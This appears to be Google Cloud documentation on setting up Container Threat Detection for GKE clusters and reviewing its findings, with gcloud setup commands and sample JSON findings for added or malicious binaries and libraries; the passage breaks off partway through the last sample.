Use Container Threat Detection

This page shows you how to review Container Threat Detection findings in the Google Cloud console and includes examples of Container Threat Detection findings.

Container Threat Detection is a built-in service of the Premium and Enterprise tiers of Security Command Center.

To view Container Threat Detection findings, the service must be enabled in Security Command Center Services settings.

Learn more about viewing and managing Container Threat Detection findings in Reviewing findings on this page.

To activate Container Threat Detection and other Premium tier detectors at the project level, see Activate Security Command Center for a project. The Enterprise tier does not support project-level activations.

Using a supported GKE version

To detect potential threats to your containers, make sure that your clusters are on a supported version of Google Kubernetes Engine (GKE). Container Threat Detection currently supports the following GKE versions on the Stable, Regular, and Rapid channels:

  • GKE Standard >= 1.15.9-gke.12
  • GKE Standard >= 1.16.5-gke.2
  • GKE Standard >= 1.17
  • GKE Standard >= 1.18.10-gke.1400
  • GKE Standard >= 1.19.2-gke.2000
  • GKE Standard >= 1.20
  • GKE Standard >= 1.21
  • GKE Autopilot >= 1.21.11-gke.900
  • GKE Standard and Autopilot >= 1.22
  • GKE Standard and Autopilot >= 1.23

Container Threat Detection supports only Container-Optimized OS node images.

Enabling Container Threat Detection

When you activate the Premium or Enterprise tier of Security Command Center, Container Threat Detection is enabled by default, unless you choose to disable it during the activation process.

If you need to enable or disable Container Threat Detection for your organization or project, you can do so on the Security Command Center Settings page. For more information, see Enable or disable a built-in service.

When you enable Container Threat Detection, either by activating Security Command Center or later, do the following:

  1. For any clusters that are not on a supported version of GKE, complete the steps in the guide to upgrade a cluster.
  2. Ensure your clusters have sufficient resources available to run the Container Threat Detection DaemonSet.
  3. In the Google Cloud console, review the Container Threat Detection service enablement settings to ensure that Container Threat Detection is enabled for your clusters.

Required IAM permissions

Container Threat Detection requires permission to enable and disable itself and manage the Container Threat Detection agent on GKE clusters.

To give the required permission, the IAM role Container Threat Detection Service Agent (roles/containerthreatdetection.serviceAgent) must be granted to the Container Threat Detection service agent, which is a type of service account.

Removing this default role from the service agent could stop Container Threat Detection from functioning properly.

Depending on how and when Security Command Center was activated, the name of the service agent that Container Threat Detection uses is different:

  • If Security Command Center was activated before December 7, 2023, Container Threat Detection uses the following user-managed service agent:

    service-PROJECT_NUMBER@gcp-sa-ktd-control.iam.gserviceaccount.com

  • If Security Command Center was activated at the organization level after December 7, 2023, Container Threat Detection uses the following user-managed organization-level service agent:

    service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.com

  • If Security Command Center was activated at the project level after December 7, 2023, Container Threat Detection uses the following user-managed organization-level service agent:

    service-project-PROJECT_NUMBER@gcp-sa-ktd-hpsa.iam.gserviceaccount.com

For more information about service agents and IAM roles, see the following:

Permissions required for custom GKE node service account

When you use a custom service account for your GKE nodes, the new node service account needs permissions to interact with Container Threat Detection. To give these permissions to the service account, you grant it the Service Account Token Creator role (roles/iam.serviceAccountTokenCreator).

  1. Grant the Service Account Token Creator role to the node service account:

    gcloud iam service-accounts add-iam-policy-binding \
      SERVICE_ACCOUNT_NAME \
      --member=serviceAccount:service-PROJECT_NUMBER@compute-system.iam.gserviceaccount.com \
      --role=roles/iam.serviceAccountTokenCreator
    

    Replace the following values:

    • Replace SERVICE_ACCOUNT_NAME with the email address of your new node service account.
    • Replace PROJECT_NUMBER with the project number where Container Threat Detection is deployed. This is crucial if it's different from the service account's project.
  2. Enable the Container Threat Detection API on the same project where the new node service account was created:

    gcloud services enable containerthreatdetection.googleapis.com --project PROJECT_ID
    

    Replace PROJECT_ID with the ID of the project where the new node service account resides.

Checking GKE cluster configuration

For Container Threat Detection to work, if your cluster is in a Virtual Private Cloud (VPC), its network must meet the routing, firewall, and DNS requirements to communicate with Google APIs and services. To access Google APIs, review the following guides:

Also, your GKE cluster configuration or organization policy constraints must not block the creation or use of any objects that Container Threat Detection needs to function. The following sections include a list of GKE objects that Container Threat Detection creates and explain how to configure essential GKE components to work with Container Threat Detection.

Kubernetes objects

After onboarding, Container Threat Detection creates several GKE objects in your enabled clusters. The objects are used to monitor container images, manage privileged containers and pods, and evaluate state to generate findings. The following table lists the objects, their properties, and essential functions.

Object Name1 Properties Function
ClusterRole container-watcher-pod-reader Grants get, watch, and list permissions on pods
ClusterRole pod-reader Grants get, watch, and list permissions on pods
ClusterRoleBinding

container-watcher-pod-reader

gce:podsecuritypolicy:container-watcher

Grants container-watcher-pod-reader and gce:podsecuritypolicy:privileged roles to container-watcher-pod-reader ServiceAccount
CustomResourceDefinition containerwatcherstatuses.containerthreatdetection.googleapis.com DaemonSet status reporting
DaemonSet container-watcher2 Privileged Interactions with Linux Security Module and container engine
Mounts /host/ as read and write Communication with Linux Security Module
Mounts /etc/container-watcher/secrets as read-only to access container-watcher-token Authentication
Uses hostNetwork Finding generation
Image
gke.gcr.io/watcher-daemonset
Enablement and upgrade
Backend
containerthreatdetection-REGION.googleapis.com:443
Finding generation
Role container-watcher-status-reporter Role with get, list, watch, create, update, patch verbs for the containerwatcherstatuses.containerthreatdetection.googleapis.com CustomResourceDefinition Allows updating DaemonSet status information
RoleBinding gce:podsecuritypolicy:container-watcher Grants gce:podsecuritypolicy:privileged role to container-watcher-pod-reader ServiceAccount Preserves functionality when PodSecurityPolicy is enabled
container-watcher-status-reporter Grants container-watcher-status-reporter role to container-watcher-pod-reader ServiceAccount
Secret container-watcher-token Authentication
ServiceAccount container-watcher-pod-reader Enablement, upgrade, and disablement

1 All objects are in the kube-system namespace, except container-watcher-pod-reader and gce:podsecuritypolicy:container-watcher.

2 During the installation, update, or removal of Container Threat Detection, Kubernetes might issue error messages for Kubernetes objects or other dependencies that are momentarily missing or incomplete. For example, there might an instance where the container-watcher-pod-reader role may be missing, which might result in preventing the installation of the pod watcher. You may see error logs such as serviceaccount "container-watcher-pod-reader" not found indicating this issue. Typically, these errors resolve automatically once Container Threat Detection completes the process. Unless the errors persist beyond a few minutes, they can be safely ignored.

PodSecurityPolicy and Admission Controllers

A PodSecurityPolicy is an admission controller resource you set up that validates requests to create and update pods on your cluster. Container Threat Detection is compatible with PodSecurityPolicies that are automatically applied when creating or updating a cluster with the enable-pod-security-policy flag. Specifically, Container Threat Detection uses the gce.privileged policy when PodSecurityPolicy is enabled.

If you use custom PodSecurityPolicies or other admission controllers, they must not block the creation or use of objects Container Threat Detection needs to function. For example, a webhook-based admission controller that rejects or overrides privileged deployments could prevent Container Threat Detection from functioning properly.

For more information, see Using PodSecurityPolicies.

Excluding environment variables from Container Threat Detection findings

By default, when Container Threat Detection generates a finding, it reports environment variables for all processes referenced in the finding. Environment variable values can be important when investigating an attack. However, some software packages store secrets and other sensitive information in environment variables. To prevent Container Threat Detection from including process environment variables in any Container Threat Detection finding, disable the REPORT_ENVIRONMENT_VARIABLES module using the Google Cloud CLI or the Security Command Center Management API's securityCenterServices.patch method at the organization, folder, or project level.

For example, to disable environment variable reporting in a project, create a file named module_config.yaml with the following contents:

REPORT_ENVIRONMENT_VARIABLES:
  intendedEnablementState: DISABLED

Then run the following command:

gcloud scc manage services update container-threat-detection \
    --module-config-file=module_config.yaml \
    --project=PROJECT_ID

To restore the default behavior, edit module_config.yaml so that it contains the following, and then run the command again:

REPORT_ENVIRONMENT_VARIABLES:
  intendedEnablementState: ENABLED

To see all of the gcloud CLI commands for managing services, see gcloud scc manage services.

Excluding CLI arguments from Container Threat Detection findings

All processes have one or more command line (CLI) arguments. By default, when Container Threat Detection includes process details in a finding, it records the CLI arguments of the process. CLI argument values can be important when investigating an attack. However, some users may pass secrets and other sensitive information in CLI arguments. To prevent Container Threat Detection from including process CLI arguments in any Container Threat Detection finding, disable the REPORT_CLI_ARGUMENTS module using Google Cloud CLI or the Security Command Center Management API's securityCenterServices.patch method at the organization, folder, or project level.

For example, to disable CLI argument reporting in a project, create a file named module_config.yaml with the following contents:

REPORT_CLI_ARGUMENTS:
  intendedEnablementState: DISABLED

Then run the following command:

gcloud scc manage services update container-threat-detection \
    --module-config-file=module_config.yaml \
    --project=PROJECT_ID

To restore the default behavior, edit module_config.yaml so that it contains the following, and then run the command again:

REPORT_CLI_ARGUMENTS:
  intendedEnablementState: ENABLED

To see all of the gcloud CLI commands for managing services, see gcloud scc manage services.

Resource usage

Container Threat Detection is designed to have a negligible performance impact on your clusters and should not have a latency impact on any cluster operations.

Resource usage depends on the workload. However, Container Threat Detection's core components—the userspace DaemonSet and Linux Security Module (LSM)—have the following estimated performance impact:

  • DaemonSet: A maximum of 0.125 vCPU and 300 MB of memory, based on hard limits set to restrict resource usage. Limits are occasionally reevaluated and can be changed to optimize performance, particularly for very large nodes.
  • LSM: Varies based on workload characteristics but, in cases that stress the LSM, we observe less than 2% of CPU and 1% of memory. You can test performance impact by instrumenting workloads with and without Container Threat Detection enabled.

If you are a BigQuery customer, you can enable GKE usage metering to monitor the resource usage of Container Threat Detection's userspace DaemonSet. To view the userspace DaemonSet in usage metering, search for namespace kube-system and label k8s-app=container-watcher.

GKE usage metering can't track kernel CPU usage specifically for the LSM. That data is included in overall CPU usage.

Container Threat Detection API

Container Threat Detection automatically enables the containerthreatdetection API during onboarding to allow finding generation. You should not interact directly with this required API. Disabling this API would damage Container Threat Detection's ability to generate new findings. If you want to stop receiving Container Threat Detection findings, disable Container Threat Detection in Security Command Center Services settings.

Reviewing findings

When Container Threat Detection generates findings, you can view them in Security Command Center. If you configured log exports to Cloud Logging, you can also view findings in Cloud Logging. To generate a finding and verify your configuration, you can intentionally trigger a detector and test Container Threat Detection.

Container Threat Detection has the following latencies:

  • Activation latency of 3.5 hours for newly onboarded organizations or projects.
  • Activation latency of minutes for newly created clusters.
  • Detection latency of minutes for threats in clusters that have been activated.

Review findings in the Google Cloud console

The IAM roles for Security Command Center can be granted at the organization, folder, or project level. Your ability to view, edit, create, or update findings, assets, and security sources depends on the level for which you are granted access. To learn more about Security Command Center roles, see Access control.

To review Container Threat Detection findings in Security Command Center follow these steps:

  1. In the Google Cloud console, go to the Findings page of Security Command Center.

    Go to Findings

  2. Select your Google Cloud project or organization.
  3. In the Quick filters section, in the Source display name subsection, select Container Threat Detection. The findings query results are updated to show only the findings from this source.
  4. To view the details of a specific finding, click the finding name under Category. The details panel for the finding opens and displays the Summary tab.
  5. On the Summary tab, review the details of the finding, including information about what was detected, the affected resource, and—if available—steps that you can take to remediate the finding.
  6. Optional: To view the full JSON definition of the finding, click the JSON tab.

To aid in your investigation, threat findings also contain links to the following external resources:

  • MITRE ATT&CK framework entries. The framework explains techniques for attacks against cloud resources and provides remediation guidance.
  • VirusTotal, an Alphabet-owned service that provides context on potentially malicious files, scripts, URLs, and domains.

For a list of Container Threat Detection findings, see Container Threat Detection detectors.

Viewing findings in Cloud Logging

To view Container Threat Detection findings in Cloud Logging, do the following:

  1. Go to the Logs Explorer page for Cloud Logging in the Google Cloud console.

    Go to Logs Explorer

  2. In the Project selector at the top of the page, select the project where you are storing your Container Threat Detection logs.

  3. Click the Query builder tab.

  4. In the Resource drop-down list, select Threat Detector.

    • To view findings from all detectors, select all detector_name.
    • To view findings from a specific detector, select its name.
  5. Alternatively, enter resource.type="threat_detector" in the query builder text box, and then click Run Query.

  6. The table is updated with the logs you selected.

  7. Create advanced log queries to specify a set of log entries from any number of logs.

Example finding formats

This section includes the JSON formats of the Container Threat Detection findings.

These examples contain the fields most common to all findings. However, all fields may not appear in every finding. The actual output you see depends on a resource's configuration and the type and state of findings. Information from Kubernetes and containerd is given by best-effort and is not guaranteed.

For more information about the fields in each finding, see the field descriptions in Resource: Finding.

Added Binary Executed

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Added Binary Executed",
    "sourceProperties": {
      "VM_Instance_Name": "INSTANCE_ID",
      "Added_Binary_Kind": "Added",
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Container_Name": "CONTAINER_NAME",
      "Parent_Pid": 1.0,
      "Container_Image_Uri": "CONTAINER_IMAGE_URI",
      "Process_Creation_Timestamp": {
        "seconds": 1.617989997E9,
        "nanos": 1.17396995E8
      },
      "Pid": 53.0,
      "Pod_Namespace": "default",
      "Process_Binary_Fullpath": "BINARY_PATH",
      "Process_Arguments": ["BINARY_PATH"],
      "Pod_Name": "POD_NAME",
      "description": "A binary that was not part of the original container image
      was executed. If an added binary is executed by an attacker, this is a
      possible sign that an attacker has control of the workload and they are
      executing arbitrary commands.",
      "Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect-
      test-4af235e12be6f9d9", "HOME\u003d/root",
      "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
      "PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "KUBERNETES_PORT_443_TCP_PORT\u003d443",
      "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
      "DEBIAN_FRONTEND\u003dnoninteractive",
      "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
      "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/"],
      "Container_Creation_Timestamp": {
        "seconds": 1.617989918E9,
        "nanos": 0.0
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T17:39:57.527Z",
    "createTime": "2021-04-09T17:39:57.625Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Added_Binary_Kind": {
        "primitiveDataType": "STRING"
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
    

Added Library Loaded

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findingsFINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Added Library Loaded",
    "sourceProperties": {
      "Process_Arguments": ["BINARY_PATH", "ADDED_LIBRARY_NAME"],
      "Parent_Pid": 1.0,
      "Container_Name": "CONTAINER_NAME",
      "Added_Library_Fullpath": "ADDED_LIBRARY_PATH",
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Container_Creation_Timestamp": {
        "seconds": 1.618004144E9,
        "nanos": 0.0
      },
      "Pod_Name": "POD_NAME",
      "Pid": 7.0,
      "description": "A library that was not part of the original container
      image was loaded. If an added library is loaded, this is a possible sign
      that an attacker has control of the workload and they are executing
      arbitrary code.",
      "VM_Instance_Name": "INSTANCE_ID",
      "Pod_Namespace": "default",
      "Environment_Variables": ["KUBERNETES_SERVICE_PORT\u003d443",
      "KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT", "HOSTNAME\u003dsuspicious-
      library", "LD_LIBRARY_PATH\u003d/tmp", "PORT\u003d8080",
      "HOME\u003d/root", "PYTHONUNBUFFERED\u003d1",
      "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
      "PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p
      ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
      , "KUBERNETES_PORT_443_TCP_PORT\u003d443",
      "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp", "LANG\u003dC.UTF-8",
      "DEBIAN_FRONTEND\u003dnoninteractive",
      "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
      "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/home/vmagent/app"],
      "Process_Binary_Fullpath": "BINARY_PATH",
      "Added_Library_Kind": "Added",
      "Container_Image_Uri": "CONTAINER_IMAGE_uri"
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T21:36:13.069Z",
    "createTime": "2021-04-09T21:36:13.267Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Added_Library_Fullpath": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Added_Library_Kind": {
        "primitiveDataType": "STRING"
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
  

Execution: Added Malicious Binary Executed

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Added Malicious Binary Executed",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T19:51:22.538Z",
    "database": {},
    "eventTime": "2023-11-13T19:51:22.383Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\"",
          "size": "68",
          "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
          "hashedSize": "68",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.68.2.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-added-test-malicious-binary\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.68.2.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.68.2.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.68.2.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "7",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "added_malicious_binary_executed"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699905066",
            "nanos": 618571329
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T19:51:06.618571329Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Execution: Added Malicious Library Loaded

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Added Malicious Library Loaded",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:40:14.340Z",
    "database": {},
    "eventTime": "2023-11-13T21:40:14.209Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/drop_mal_lib\"",
          "size": "5005064",
          "sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",
          "hashedSize": "5005064",
          "partiallyHashed": false
        },
        "libraries": [
          {
            "path": "\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\"",
            "size": "68",
            "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
            "hashedSize": "68",
            "partiallyHashed": false
          }
        ],
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/drop_mal_lib\"",
          "\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.108.174.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-added-malicious-library\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.108.174.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.108.174.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.108.174.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "8",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
